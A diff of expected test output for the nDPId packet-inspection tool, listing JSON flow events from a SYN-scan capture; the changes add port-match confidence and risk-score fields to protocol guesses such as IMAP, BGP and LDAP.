 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5804,13 +5804,13 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}}
+00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}}
+00784{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5842,9 +5842,9 @@
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","ndpi": {"proto":"BGP","breed":"Acceptable","category":"Network"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","ndpi": {"proto":"BGP","breed":"Acceptable","category":"Network"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5910,11 +5910,11 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","ndpi": {"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","ndpi": {"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6086,11 +6086,11 @@
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","ndpi": {"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
